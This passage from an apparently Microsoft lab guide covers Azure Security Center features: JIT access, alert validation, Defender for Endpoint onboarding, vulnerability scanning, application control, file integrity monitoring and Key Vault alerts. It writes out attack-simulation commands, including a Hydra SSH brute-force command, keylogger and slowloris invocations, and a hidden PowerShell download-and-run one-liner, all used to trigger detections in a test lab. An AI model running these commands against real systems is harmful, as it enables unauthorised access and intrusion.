3. Select Request access. The Request access window opens.

4. Under Request access, for each VM, configure the ports that you want to open
and the source IP addresses that the port is opened on and the time window for
which the port will be open. It will only be possible to request access to the
configured ports. Each port has a maximum allowed time derived from the JIT
configuration you've created.
5. Select Open ports.
If a user who is requesting access is behind a proxy, the option My IP may not work. You may
need to define the full IP address range of the organization.
Audit JIT access activity in Security Center
You can gain insights into VM activities using log search. To view the logs:
1. From Just-in-time VM access, select the Configured tab.

2. For the VM that you want to audit, open the ellipsis menu at the end of the row.
3. Select Activity Log from the menu.
Page 31
4. The activity log provides a filtered view of previous operations for that VM along
with time, date, and subscription.
5. To download the log information, select Download as CSV.
Simulate and detect attacks on Linux

Security Center uses a variety of detection capabilities to alert customers to potential attacks
targeting their environments. For Linux, Security Center uses auditd to collect records from Linux
machines. Auditd records are collected, aggregated into events, and enriched using the latest
version of the Microsoft Monitoring Agent. Audit events are stored in your workspace and
analyzed by Security Center. When threats are detected, a Security Center is generated.
In this scenario the attacker (VM1) will initiate by sending a SSH Brute Force attack against its
target machine (VM2), after gaining access to it, it will start to compile a suspicious file and to
finalize the attack, it will initiate a remote shell with another machine. For this example, the
Page 32
remote shell execution will be done against VM1. Optionally you could provision three VMs and
perform the last step against VM3, but this is not mandatory.
Pre-requisites
You will need an Azure environment with at least two Linux Virtual Machine (VM), these VMs should
have the following Linux distribution installed:
• AttackerVM: Kali Linux obtained from Azure Marketplace.

• VictimVM: Ubuntu versions 12.04 LTS, 14.04 LTS or 16.04 LTS (for the latest list of supported
Ubuntu versions, visit Supported platforms in Azure Security Center article).
o VictimVM is the only one that you should ensure that the Security Center agent is
installed and operational.
o Make sure to take note of the public IP address of this VM after provisioning it.
page
Page 33
Note: for more information on how to provision a Linux VM in Azure, visit this article.
AttackerVM
1. When provisioning this VM, make sure to

a. Enable password authentication
b. Enable external access through SSH.
2. Make sure to take note of the public IP address of this VM after provisioning it.
VictimVM
1. When provisioning this VM, make sure to:

a. Enable password authentication
b. Enable external access through SSH.
2. Make sure to take note of the public IP address of this VM after provisioning it.
3. After provisioning VictimVM, check if auditd is running by using service auditd status
4. If the command fails, is because you don’t have auditd installed. In this case, install auditd
using the command sudo apt install auditd
Page 34
5. Once it finishes, verify if auditd is running by using the same command that you used in
step 1.
6. Install dnsutils package by running sudo apt install dnsutils
7. Create 5 local users account in this VM (use any name and password you want). These
users will be used during the first exercise (SSH brute force attack). To create a user
account use this command sudo adduser <username>. To set user’s password you can
use the command sudo passwd <username>.
Verify VM Status in Security Center
1. After provisioning this VM, enable Azure Security Center in the subscription level, and the
agent will be automatically installed on the VM. Read Enable Data Collection article for
more details on this.
a. If you are using an existing subscription with Azure Security Center already
enabled, and auto provision is off due business reasons, you need to install the
agent manually. Refer to this article for more information on how to install.
2. If you have not enabled Azure Defender for Servers yet, you will need to before
continuing.
Page 35
3. Before proceeding, open Security Center dashboard, go to Inventory and search for your
VM where Ubuntu is installed (VM2) and make sure that the Monitoring State field is
showing as Monitored by Azure Security Center. Also review the Monitoring agent health
issues and Install monitoring agent on your machine’s assessments are showing as
healthy, as shown in the example below:
Note:
It can take up to 12 to 14 hours to have the agent in healthy state. Don’t proceed to the
tests unless it is healthy.
Executing the Attack
The steps that follow are grouped in the different phases of the cyber kill chain.
Cyber kill chain phase: Target and Attack
SSH brute force attack against Linux Servers is still a widely used method to establish the initial
footprint. In 2018 attackers used the GoScanSSH to target public facing SSH servers, while
Page 36
avoiding those that were linked to government and military IP addresses. Without a monitoring
system in place, the likelihood that this attack will succeed, and you will not be aware is high. If
your workload is in Azure, you can reduce the likelihood that this attack will succeed, by using
just-in-time VM access feature in Security Center. To simulate how Security Center will detect
this attack, execute the steps below.
1. To launch the SSH brute force attack from the Kali Linux machine, you will need to use a
built-in list of users and passwords. Since this is a very long list, you will create a reduced
copy of this file. Logon to AttackerVM using SSH, and perform the following tasks.
cd /usr/share/wordlists
sudo -s
gzip -d rockyou.txt.gz
head -n 20 rockyou.txt > user.txt
head -n 20 rockyou.txt > pass.txt
2. Using your preferred text editor (if you don’t have one, you can use a text editor from
Midnight Commander – type sudo mc to start it, select the file to edit and press F4),
open the user.txt file (you may need to use sudo) and leave only 20 entries in there
(remove all other words). Once you finish, add the name of the 5 users that you created
on VictimVM. Make sure to randomize the location, for example: insert one valid
username after the fifth entry, another after the seventh entry and so on.
3. Repeat the same procedure but now for the file pass.txt. However, in this case, you will
insert the valid passwords that you used for those five accounts that you created.
Randomize the password in a different order that you randomize the user name.
4. Now that everything is in place, you can use Hydra to launch your attack against
VictimVM. Type the command below in your Kali VM, and replace <IP> for the VictimVM
public IP address:
hydra -I -L user.txt -P pass.txt <IP> -t 4 ssh
In a while you should start getting results.
Page 37
5. Take a note for one of the discovered credentials. You will used during the next steps.
Cyber kill chain phase: Install and Exploit
On this phase of the cyber kill chain, Security Center will look for lateral movement, suspicious
process execution, and other type of actions that are usually executed on this phase. An attacker
could use this phase to launch a hacking tool to perform malicious operations. The commands
that follows must be executed in VictimVM.
1. Log on to VictimVM via ssh using one of the brute-forced credentials.

2. Run the command below to simulate an attacker that is trying to start logkeys to set up
the system to capture credentials and other useful information.
logkeys --start
Note:
If you don’t have logkeys installed, you will receive an error message, but for the
purpose of this example, don’t worry because Security Center will detect anyway.
3. Attackers can also use this phase to perform internal recon and based on the data launch
attack against other system within the internal network. For this example, the assumption
is that the attacker already performed some internal recon using nmap to enumerate the
servers and domain, and now he is going to use a hacking tool to launch an attack
against one web server. Run the command below:
perl slowloris.pl -dns server.contoso.com
Note:
You will receive an error message if you don’t have this script on your system, but for
the purpose of this example you don’t need to worry about this error.
Page 38
Cyber kill chain phase: Post Breach
On this phase of the cyber kill chain, attackers usually will communicate with command and
control (C2) to either transfer data to C2 or download more malicious software. For this example,
you will download the EICAR malware test file using WGET for the IP address. The commands
that follows must be executed in VictimVM (Ubuntu VM).
1. First, obtain the IP address of the target

nslookup www.eicar.org
2. Download a file
wget http://www.eicar.org/download/eicar.com
Note:
If you have issues download eicar.com, try download eicar.com.txt
3. Once you finish, you can delete this test file

rm eicar.com -f
Reviewing Security Center Alerts
Now is time wo review the alerts generated by Security Center during this simulation. Follow the
steps below to do that.
1. Open Azure Security Center dashboard.

2. On the left pane, click Security Alerts.
Page 39
3. Organize the alerts by date by clicking on the Date column, and start reviewing it. Notice
that the first alert you will receive corresponds to the SSH brute force attack simulation.
In the description of this attack, you will see the username that successfully login via SSH.
4. Notice that the first alert you will receive corresponds to the SSH brute force attack
simulation. In the description of this attack, you will see the username that successfully
login via SSH.
5. Next you will see the logkeys detections through the Potential credential access tool
detected alert. In this alert’s description you may see another process name (instead of
logkeys) in case you don’t have this tool. In the example that follows, the process
python3.6
6. Next you will see hacking tool detection, through the Possible attack tool detected
alert. This alert shows the details about the command line, and the suspicious process ID,
as shown below:
7. The last alert from the list is the Detected suspicious file download, which has the
details about the command line that was executed to download the malware test file.
Page 40
Alerts validation
Alerts are the notifications that Security Center generates when it detects threats on your
resources. It prioritizes and lists the alerts along with the information needed to quickly
investigate the problem. Security Center also provides recommendations for how you can
remediate an attack. For more information, see Security alerts in Security Center and Managing
and responding to security alerts.
This scenario dedicated to generation of test alert for Windows and Linux machines, it’s
probably the easiest and the fasters way to validate that machines are indeed protected by
Azure Security Center.
Validate alerts for Windows machines
1. Log on to a Windows machine onboarded to Azure Security Center. This could be the
Windows VM you prepared as a part of the delivery pre-requisites.
2. Copy an executable (for example – calc.exe) to the computer’s desktop, or other
directory of your convenience, and rename it as ASC_AlertTest_662jfi039N.exe.
3. Open the command prompt and execute this file with an argument (just a fake argument
name), such as: ASC_AlertTest_662jfi039N.exe -foo
4. Wait 5 to 10 minutes and open Security Center Alerts. An alert similar to the one below
should be displayed.
Page 41
Validate alerts for Linux machines
1. Log on to a Linux machine onboarded to Azure Security Center. This could be the Linux
VM you prepared as a part of the delivery pre-requisites.
2. Copy an executable to a convenient location and rename it to ./asc_alerttest_662jfi039n,
for example: cp /bin/echo ./asc_alerttest_662jfi039n
3. Open the command prompt and execute this file: ./asc_alerttest_662jfi039n testing
eicar pipe
4. Wait 5 to 10 minutes and open Security Center Alerts. An alert similar to the example
below should be displayed.
Page 42
Security Center's integrated EDR solution Microsoft Defender for
Endpoint
Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution.
Its main features are:
• Risk-based vulnerability management and assessment

• Attack surface reduction
• Behavioral based and cloud-powered protection
• Endpoint detection and response (EDR)
• Automatic investigation and remediation
• Managed hunting services
Pre-requisites
To enable Security Center's integrated EDR solution Microsoft Defender for Endpoint
requires Azure Defender for servers to be enabled on the subscription.
Supported platforms:
• Azure machines running Windows

• Azure Arc machines running Windows
Supported versions of Windows:
Defender for Endpoint is built into Windows 10 1703 (and newer) and Windows Server 2019.
Security Center supports detection on Windows Server 2016, 2012 R2, and 2008 R2 SP1.
Server endpoint monitoring using this integration has been disabled for Office 365 GCC
customers.
Required roles and permissions:
To enable/disable the integration: Security admin or Owner

To view Microsoft Defender for Endpoint (MDE) alerts in Security Center: Security
reader, Reader, Resource Group Contributor, Resource Group Owner, Security
admin, Subscription owner, or Subscription Contributor
Page 43
page
Microsoft Defender for Endpoint tenant location
When you use Azure Security Center to monitor your servers, a Microsoft Defender for
Endpoint tenant is automatically created. Data collected by Defender for Endpoint is
stored in the geo-location of the tenant as identified during provisioning. Customer
data - in pseudonymized form - may also be stored in the central storage and
processing systems in the United States.
After you've configured the location, you can't change it. If you need to move your data
to another location, contact Microsoft Support to reset the tenant.
Page 44
Enabling the Microsoft Defender for Endpoint integration
1. Enable Azure Defender for servers. See Pricing of Azure Security Center.
2. If you've already licensed and deployed Microsoft Defender for Endpoints on your
servers, remove it using the procedure described in Offboard Windows servers.
3. From Security Center's menu, select Pricing & settings.
4. Select the subscription you want to change.
5. Select Threat detection.
6. Select Allow Microsoft Defender for Endpoint to access my data, and
select Save.
Azure Security Center will automatically onboard your servers to Microsoft Defender
for Endpoint. Onboarding might take up to 24 hours.
Automatically onboard Windows Server 2019 and Linux from Azure Security
Center to Microsoft Defender for Endpoint
Azure Defender for Servers offers an integration with Microsoft Defender for Endpoints, that
allows you to onboard servers automatically from Azure Security Center without manual
interaction. However, currently, there is no automated onboarding for Windows Server 2019 and
Linux servers. This solution helps you to find these servers to get visibility and to run an
automation that will onboard these servers to Microsoft Defender for Endpoints.
Important: It’s recommended the steps below should be followed using the updated GitHub
guide
Page 45
Release notes
• Version 2 - Supports both Azure VM and Azure Arc machines based on Linux either
Ubuntu or Debian distributions.
• Version 1 – Supports both Azure VM and Azure Arc machines based on Windows Server
2019 operating systems.
What is it?
Using a custom policy initiative, Azure Security Center will determine if a machine is connected
to an Azure Defender for Servers-enabled subscription and if it has the Microsoft Defender for
Endpoints package installed. If it has not been installed, this server will be marked as unhealthy.
From the recommendation, you can then select these machines and trigger the automation that
will onboard these machines to Microsoft Defender for Endpoints.
Prerequisites
1. Microsoft Defender for Endpoints enrollment. This can automatically be created once
you enable the Azure Security Center integration, as explained in the ASC
documentation.
How it works
1. Built-in policy initiative ensure that Guest Config policy is deployed on VMs -
[Preview]: Deploy prerequisites to enable Guest Configuration policies on virtual
machines.
2. Custom recommendation on ASC identifies Windows Server 2019 and Linux
machines that do not have MDE configured yet.
3. Logic App automation to be trigger manually or automatically (using workflow
automation) on the unhealthy resources.
4. A custom script extension (both Azure VM and Azure Arc machine) to pull the
script from the storage account and onboard unhealthy resources.
Please note! the solution won’t work if there is already custom script extension deployed on a
VM.
Installation instructions
Identify potential machines using Azure Policy
Page 46
1. On the Azure portal, navigate to Azure Policy blade or click here.
2. Assign the [Preview]: Deploy prerequisites to enable Guest Configuration policies on virtual
machines initiative – this step is necessary to deploy the guest configuration extension
on virtual machines (both Linux and Windows).
3. To deploy to Azure click here
o On the Definition location select either subscription or a management

group. Click Save.
4. From Security Center's sidebar, select Security policy.
5. Select a desired scope for policy initiative (either subscription or management

group).
6. At the your custom initiatives section at the bottom, click Add a custom
initiative. On the Add custom initiatives click on Create new. Provide the
following details:
o Name: MDE Onboarding

o Category: Security Center
o On the available definitions, click the + Audit Windows Server 2019
machines that don't have Microsoft Defender for Endpoint
configured and + Audit Linux machines that don't have Microsoft
Defender for Endpoint configured.
o If you want to include Azure Arc machine, set the value as True
o Click Save
o MDE Onboarding now appears on the page. Click Add.
▪ Click Review + Create.
▪ Click Create.
o MDE Onboarding is now assigned into Security Center. Wait few hours
until the new custom recommendation appears on the ASC
recommendations list.
Automate remediation using Logic App
1. Deploy the Logic app automation and a storage account with private blob
container:
2. To Deploy to Azure click here
Page 47
o Provide a name for the storage account.
3. Authorize the ARM-Configure-MDE Logic App connection:
o From the Logic App’s sidebar, select API connections.

o Select ARM-Configure-MDE connection.
o From the sidebar, select Edit API connection.
o Select Authorize and authenticate using your credentials.
o Select Save to apply your changes.
4. On Azure Defender for Servers-enabled subscription, navigate to Microsoft Defender

Security Center onboarding page
5. From the dropdown menu (operating system to start onboarding process),

select Windows Server 1803 and 2019.
6. On the Deployment method dropdown menu, select Group Policy and then
click on the Download package.
7. Extract the WindowsDefenderATPOnboardingPackage.zip package to get

the WindowsDefenderATPOnboardingScript.cmd file - this file is unique per
organization.
8. From the dropdown menu (operating system to start onboarding process),

select Linux Server.
9. Verify that local script is selected as the deployment method and then click
on download onboarding package.
Page 48
10. Extract the WindowsDefenderATPOnboardingPackage.zip package to get
the MicrosoftDefenderATPOnboardingLinuxServer.py file - this file is unique per
organization.
11. Download ConfigureDefender.zip and extract it.
12. Upload 4 files

(WindowsDefenderATPOnboardingScript.cmd, MicrosoftDefenderATPOnboardingLi
nuxServer.py, ConfigureDefender.ps1 and ConfigureDefender.sh) to
the scripts private blob container (storage account).
Remediate unhealthy resources
Once the Azure Policy evaluation completed, you should see two new custom recommendation
for both Windows Server 2019 and Linux as follow:
Within each recommendation, you should get all healthy and unhealthy resources. To remediate
unhealthy resources, select items from the list and click Trigger logic app. Select
the Configure-MDE.
Page 49
Please note! you can also use the workflow automation capability to automatically trigger
the logic app once a new unhealthy machine appears on the Audit Windows Server 2019
machines that don't have Microsoft Defender for Endpoint configured recommendation.
Access the Microsoft Defender for Endpoint portal
1. Ensure the user account has the necessary permissions. Learn more.
2. Check whether you have a proxy or firewall that is blocking anonymous traffic. The
Defender for Endpoint sensor connects from the system context, so anonymous
traffic must be permitted. To ensure unhindered access to the Defender for
Endpoint portal, follow the instructions in Enable access to service URLs in the
proxy server.
3. Open the Microsoft Defender Security Center portal. Learn more about the portal's
features and icons, in Microsoft Defender Security Center portal overview.
Send a test alert
To generate a benign Microsoft Defender for Endpoint test alert:
Page 50
1. Create a folder 'C:\test-MDATP-test'.
2. Use Remote Desktop to access either a Windows Server 2012 R2 VM or a Windows
Server 2016 VM.
3. Open a command-line window.
4. At the prompt, copy and run the following command. The Command Prompt window
will close automatically.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object

System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-
test\\invoice.exe'); Start-Process 'C:\\test-MDATP-test\\invoice.exe'
5. If the command is successful, you'll see a new alert on the Azure Security Center
dashboard and the Microsoft Defender for Endpoint portal. This alert might take a few
minutes to appear.
6. To review the alert in Security Center, go to Security alerts > Suspicious PowerShell
CommandLine.
7. From the investigation window, select the link to go to the Microsoft Defender for
Endpoint portal.
Azure Defender's integrated vulnerability assessment solution
The vulnerability scanner included with Azure Security Center is powered by Qualys. Qualys'
scanner is one of the leading tools for real-time identification of vulnerabilities. It's only available
with Azure Defender for servers. You don't need a Qualys license or even a Qualys account -
everything's handled seamlessly inside Security Center.
A core component of every cyber risk and security program is the identification and analysis of
vulnerabilities.
Security Center regularly checks your connected machines to ensure they're running
vulnerability assessment tools.
When a machine is found that doesn't have vulnerability assessment solution deployed, Security
Center generates the following security recommendation:
A vulnerability assessment solution should be enabled on your virtual machines
Use this recommendation to deploy the vulnerability assessment solution to your Azure virtual
machines and your Azure Arc enabled hybrid machines.
Page 51
Deploy the vulnerability assessment solution that best meets your needs and budget:
• Integrated vulnerability assessment solution (powered by Qualys) - Azure

Defender includes vulnerability scanning for your machines at no extra cost. You
don't need a Qualys license or even a Qualys account - everything's handled
seamlessly inside Security Center. This page provides details of this scanner and
instructions for how to deploy it.
Pre-requisites
To enable Azure Defender’s vulnerability assessment solution for Azure and hybrid machines
requires Azure Defender for servers to be enabled on the subscription.
Supported machines
• Azure and non-Azure machines running Windows and Linux

• Azure Arc machines
• Resource owner can deploy the scanner

• Security reader can view findings
Page 52
page
Deploy the integrated scanner to your Azure and hybrid machines
1. From the Azure portal, open Security Center.

2. From Security Center's menu, open the Recommendations page.
3. Select the recommendation A vulnerability assessment solution should be enabled
on your virtual machines.
Page 53
4. Choose the recommended option, Deploy ASC integrated vulnerability scanner,
and Proceed.
5. You'll be asked for one further confirmation. Select Remediate.
6. The scanner extension will be installed on all of the selected machines within a few
minutes.
7. Scanning begins automatically as soon as the extension is successfully deployed. Scans
will then run at four-hour intervals. This interval isn't configurable.
Adaptive Application Control
Adaptive application controls are an intelligent and automated solution for defining allow lists
of known-safe applications for your machines.
Security Center uses machine learning to analyze the applications running on your machines
and create a list of the known-safe software. Allow lists are based on your specific Azure
workloads, and you can further customize the recommendations using the instructions below.
When you've enabled and configured adaptive application controls, you'll get security alerts if
any application runs other than the ones you've defined as safe.
Page 54
By defining lists of known-safe applications, and generating alerts when anything else is
executed, you can achieve multiple hardening goals:
• Identify potential malware, even any that might be missed by antimalware

solutions
• Improve compliance with local security policies that dictate the use of only licensed
software
• Avoid running old or unsupported applications
• Prevent specific software that's banned by your organization
• Increase oversight of apps that access sensitive data
Pre-requisites
To enable Adaptive Application requires Azure Defender for servers to be enabled on the
subscription.
Supported machines:

• Azure Arc machines
• Security Reader and Reader roles can both view groups and the lists of known-safe
applications
• Contributor and Security Admin roles can both edit groups and the lists of known-safe
applications
Page 55
page
Enable Adaptive Application Controls on a group of machines
If Security Center has identified groups of machines in your subscriptions that consistently run a
similar set of applications, you'll be prompted with the following recommendation: Adaptive
application controls for defining safe applications should be enabled on your machines.
You can select the recommendation, or open the adaptive application controls page to view the
list of suggested known-safe applications and groups of machines.
Page 56
1. Open the Azure Defender dashboard and from the advanced protection area,
select Adaptive application controls.
2. Please note that The Groups of VMs section contains several tabs:
Configured - Groups of machines that already have a defined allow list of applications.
For each group, the configured tab shows:
• the number of machines in the group
• recent alerts
Recommended - Groups of machines that consistently run the same applications, and
don't have an allow list configured. We recommend that you enable adaptive application
controls for these groups.
No recommendation - Machines without a defined allow list of applications, and which
don't support the feature. Your machine might be in this tab for the following reasons:
• It's missing a Log Analytics agent
• The Log Analytics agent isn't sending events
• It's a Windows machine with a pre-existing AppLocker policy enabled by either a
GPO or a local security policy
Important: Security Center needs at least two weeks of data to define the unique
recommendations per group of machines. Machines that have recently been created, or
which belong to subscriptions that were only recently enabled with Azure Defender, will
appear under the No recommendation tab.
Page 57
2. Open the Recommended tab. The groups of machines with recommended allow lists
appears.
3. Select a group.
4. To configure your new rule, review the various sections of this Configure application
control rules page and the contents, which will be unique to this specific group of
machines:
A. Select machines - By default, all machines in the identified group are selected. Unselect
any to removed them from this rule.
B. Recommended applications - Review this list of applications that are common to the
machines within this group, and recommended to be allowed to run.
C. More applications - Review this list of applications that are either seen less frequently
on the machines within this group, or are known to be exploitable. A warning icon
indicates that a specific application could be used by an attacker to bypass an
application allow list. We recommend that you carefully review these applications.
Page 58
D. To apply the rule, select Audit.
Edit a group's adaptive application controls rule
You might decide to edit the allow list for a group of machines because of known changes in
your organization.
To edit the rules for a group of machines:
2. From the Configured tab, select the group with the rule you want to edit.
3. Review the various sections of the Configure application control rules page as
described in Enable adaptive application controls on a group of machines.
4. Optionally, add one or more custom rules:
a. Select Add rule.
b. If you're defining a known safe path, change the Rule type to 'Path' and enter a
single path. You can include wildcards in the path.
c. Define the allowed users and protected file types.
d. When you've finished defining the rule, select Add.
Page 59
Review and edit a group's settings
1. To view the details and settings of your group, select Group settings
Below shows the name of the group (which can be modified), the OS type, the location,
and other relevant details.
Important: The Enforce option, in the file type protection mode settings, is greyed out
in all scenarios. No enforcement options are available at this time.
1. Modify the group's name or file type protection modes.

2. Select Apply and Save.
Page 60
Respond to the "Allowlist rules in your adaptive application control policy
should be updated" recommendation
You'll see this recommendation when Security Center's machine learning identifies potentially
legitimate behavior that hasn't previously been allowed. The recommendation suggests new
rules for your existing definitions to reduce the number of false positive alerts.
To remediate the issues:
1. From the recommendations page, select the Allowlist rules in your adaptive
application control policy should be updated recommendation to see groups with
newly identified, potentially legitimate behavior.
2. Select the group with the rule you want to edit.
3. Review the various sections of the Configure application control rules page as
described in Enable adaptive application controls on a group of machines.
4. To apply the changes, select Audit.
Audit alerts and violations
2. To see groups with machines that have recent alerts, review the groups listed in
the Configured tab.
3. To investigate further, select a group.
4. For further details, and the list of affected machines, select an alert.
Page 61
Move a machine from one group to another
When you move a machine from one group to another, the application control policy applied to
it changes to the settings of the group that you moved it to. You can also move a machine from
a configured group to a non-configured group, doing so removes any application control rules
that were applied to the machine.
2. From the Adaptive application controls page, from the Configured tab, select the
group containing the machine to be moved.
3. Open the list of Configured machines.
4. Open the machine's menu from three dots at the end of the row, and select Move.
The Move machine to a different group pane opens.
5. Select the destination group, and select Move machine.
6. To save your changes, select Save.
Simulate change for Adaptive Application Control policy and validate Security
Center alert
1. Log on to the target VM.

2. Download, install and run a software you didn’t have on this machine before, for
example – Tor Browser.
3. In a while you should be able to see an alert similar to the one below:
Page 62
File Integrity Monitoring
File integrity monitoring (FIM), also known as change monitoring, examines operating system
files, Windows registries, application software, Linux system files, and more, for changes that
might indicate an attack.
Security Center recommends entities to monitor with FIM, and you can also define your own FIM
policies or entities to monitor. FIM alerts you for suspicious activity such as:
• File and registry key creation or removal

• File modifications (changes in file size, access control lists, and hash of the content)
• Registry modifications (changes in size, access control lists, type, and the content)
FIM works by comparing the current state of these items with the state during the previous scan,
FIM alerts you if suspicious modifications have been made.
FIM uses the Azure Change Tracking solution to track and identify changes in your environment.
When file integrity monitoring is enabled, you have a Change Tracking resource of
type Solution. For data collection frequency details, see Change Tracking data collection details.
Important: If you remove the Change Tracking resource, you will also disable the file integrity
monitoring feature in Security Center.
Page 63
Pre-requisites
To enable File Integrity Monitoring requires Azure Defender for servers to be enabled on the
subscription.
Supported machines
• Workspace owner can enable/disable FIM

• Reader can view results
page
Page 64
Enable FIM
Follow the steps below to enable FIM.
1. From Azure Defender dashboard's Advanced protection area, select File integrity
monitoring.
2. The File integrity monitoring configuration page opens displaying the number of
Windows and Linux machines under the workspace.
From here you can:
• Access and view the status and settings of each workspace
• Upgrade the workspace to use Azure Defender. This icon Indicates that
the workspace or subscription isn't protected by Azure Defender. To use the FIM
features, your subscription must be protected by Azure Defender.
• Enable FIM on all machines under the workspace and configure the
FIM options. This icon indicates that FIM is not enabled for the workspace.
Page 65
Important: If there's no enable or upgrade button, and the space is blank, it means that
FIM is already enabled on the workspace.
3. Select ENABLE. The details of the workspace including the number of Windows and
Linux machines under the workspace is shown.
The recommended settings for Windows and Linux are also listed. Expand Windows
files, Registry, and Linux files to see the full list of recommended items.
4. Clear the checkboxes for any recommended entities you do not want to be monitored by
FIM.
Page 66
5. Select Apply file integrity monitoring to enable FIM.
Important: Once you enable FIM it will take (15-20 minutes) to see changes
File Integrity Monitoring Dashboard
The File integrity monitoring dashboard displays for workspaces where FIM is enabled. The
FIM dashboard opens after you enable FIM on a workspace or when you select a workspace in
the file integrity monitoring window that already has FIM enabled.
The FIM dashboard for a workspace displays the following details:
• Total number of machines connected to the workspace

• Total number of changes that occurred during the selected time period
• A breakdown of change type (files, registry)
• A breakdown of change category (modified, added, removed)
Page 67
Select Filter at the top of the dashboard to change the time period for which changes are
shown.
The Servers tab lists the machines reporting to this workspace. For each machine, the
dashboard lists:
• Total changes that occurred during the selected period of time

• A breakdown of total changes as file changes or registry changes
When you select a Server under the Server tab Log Analytics opens.
Page 68
When you select the Changes tab you can use the search option to find changes.
Page 69
Edit monitored entities
The steps below will guide you on how to add/modify monitored entities. These steps can be
used when you need to edit change tracking of Windows Files, Linux Files and Windows
Registry, for example, you can:
• Enable (True) or disable (False) file integrity monitoring

• Provide or change the entity name
• Provide or change the value or path
• Add or delete the entity, discard the change, or save the change
Follow the steps below to add a Windows Registry entity change tracking:
1. From the File Integrity Monitoring dashboard select Settings
2. Select Add in the Windows Registry tab

3. Enter the below information:
3. Save
4. Now on a test machine and create, then modify the value and monitor the FIM
dashboard for change notifications
* Registry notifications can take up to 50 minutes to be reflected in the FIM dashboard
Page 70
Enable built-in recursive registry checks
The FIM registry hive defaults provide a convenient way to monitor recursive changes within
common security areas. For example, an adversary may configure a script to execute in
LOCAL_SYSTEM context by configuring an execution at startup or shutdown. To monitor
changes of this type, enable the built-in check.
Important: Recursive checks apply only to recommended security hives and not to custom
registry paths.
Add a custom registry check
FIM baselines start by identifying characteristics of a known-good state for the operating system
and supporting application. For this example, we will focus on the password policy
configurations for Windows Server 2008 and higher.
Example locations:
Policy Name Registry Setting
Domain controller: Refuse machine MACHINE\System\CurrentControlSet\Services

account password changes \Netlogon\Parameters\RefusePasswordChange
Domain member: Digitally encrypt or sign MACHINE\System\CurrentControlSet\Services

secure channel data (always) \Netlogon\Parameters\RequireSignOrSeal
Domain member: Digitally encrypt secure MACHINE\System\CurrentControlSet\Services

channel data (when possible) \Netlogon\Parameters\SealSecureChannel
Domain member: Digitally sign secure MACHINE\System\CurrentControlSet\Services

channel data (when possible) \Netlogon\Parameters\SignSecureChannel
Domain member: Disable machine MACHINE\System\CurrentControlSet\Services

account password changes \Netlogon\Parameters\DisablePasswordChange
Page 71
Domain member: Maximum machine MACHINE\System\CurrentControlSet\Services
account password age \Netlogon\Parameters\MaximumPasswordAge
Domain member: Require strong MACHINE\System\CurrentControlSet\Services

(Windows 2000 or later) session key \Netlogon\Parameters\RequireStrongKey
Network security: Restrict NTLM: NTLM MACHINE\System\CurrentControlSet\Services

authentication in this domain \Netlogon\Parameters\RestrictNTLMInDomain
Network security: Restrict NTLM: Add MACHINE\System\CurrentControlSet\Services

server exceptions in this domain \Netlogon\Parameters\DCAllowedNTLMServers
Network security: Restrict NTLM: Audit MACHINE\System\CurrentControlSet\Services

NTLM authentication in this domain \Netlogon\Parameters\AuditNTLMInDomain
Important: To learn more about registry settings supported by various operating system
versions, refer to the Group Policy Settings reference spreadsheet.
Configure FIM to monitor registry baselines
1. From the File Integrity Monitoring dashboard select Settings
2. Select Add in the Windows Registry tab

3. Enter the below information for registry path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
Page 72
Trigger Change Tracking
The steps below can be used to demonstrate change tracking by creating autoexec.bat file in
the c: drive.
1. Log on to one of the machines attached to Security Center

2. If you can (outside of change control), Modify/Create the C:\autoexec.bat file. Simply
add a comment and save the file.
3. A change notification should be displayed in the FIM dashboard within 30 minutes.
Page 73
The following table shows the data collection frequency for the types of changes:
Change type Frequency

Windows registry 50 minutes
Windows file 30 minutes
Linux file 15 minutes
More details are covered in the article: https://docs.microsoft.com/en-

us/azure/automation/automation-change-tracking
View FIM Change Data Changes using Log Analytics
File Integrity Monitoring data resides within the Azure Log Analytics /
ConfigurationChange table set.
Set a time range to retrieve a summary of changes by resource. In the following

example, we are retrieving all changes in the last fourteen days in the categories of
registry and files:
ConfigurationChange
| where TimeGenerated > ago(14d)
| where ConfigChangeType in ('Registry', 'Files')
Page 74
| summarize count() by Computer, ConfigChangeType
To view details of the registry changes:
1. Remove Files from the where clause,

2. Remove the summarization line and replace it with an ordering clause:
ConfigurationChange
| where ConfigChangeType in ('Registry')
| order by Computer, RegistryKey
Reports can be exported to CSV for archival and/or channeled to a Power BI report.
2.5 Azure Defender for Key Vault

Azure Defender for Key Vault provides an additional layer of security intelligence. This tool
detects potentially harmful attempts to access or exploit Key Vault accounts. Using Azure
Page 75
Defender’s native advanced threat protection, you can address threats without being a security
expert, and without learning additional security monitoring systems.
When Security Center detects anomalous activity, it displays alerts. It also emails the
subscription administrator with details of the suspicious activity and recommendations for how
to investigate and remediate the identified threats.
Pre-requisites
To protect your Key Vault accounts you have to enable Azure Defender and Azure Defender for
Key Vault.
Enable Key Vault in Security Center's pricing and settings page
1. Go to Azure Security Center Settings & settings page, select the relevant subscription,
and enable Key Vaults in the Azure Defender plans page.
Page 76
Create an Azure Key Vault and enable Azure Defender protection
1. Log on to Azure Portal, go to Key Vaults and click Add button to create a new Azure Key
Vault
2. Fill the properties for the new Key Vault and click Review+create, Create.
Create a new secret in the Key Vault

1. We need to issue a certificate to store it our Key Vault. Azure Key Vault allows to generate
self-signed certificate natively, and this would be the fastest way.
2. Log on to Azure Portal and switch to Azure Key Vault. Click on Secrets to switch to
Secrets blade. The click on Generate/Import button.
Page 77
3. Enter Name and Value for your secret, and leave all other values as is. Click Create.
Simulate a suspicious activity against Key Vault and check Azure

Security Center notification
1. To simulate a suspicious activity we can use Tor Browser. Download it on Windows
machine you prepared before the delivery, open it and log on to Azure Portal.
2. Switch to Key Vaults, open your key vault, click on Secrets and retrieve the stored secret
by clicking on Show Secret Value button.
Page 78
3. Wait a while and check Azure Security Center for an alert related to your Key Vault.
Note:
By the time of writing Azure Security Center allows detection of the following suspicious
activities: Review the updated list of Key Vault alerts
- Access from a TOR exit node to a Key Vault
- Suspicious policy change and secret query in a Key Vault
- Unusual user-application pair accessed a Key Vault
- Unusual application accessed a Key Vault
- Unusual user accessed a Key Vault
- Unusual operation pattern in a Key Vault
- High volume of operations in a Key Vault
- User accessed high volume of Key Vaults
Page 79
Respond to Azure Defender for Key Vault alerts
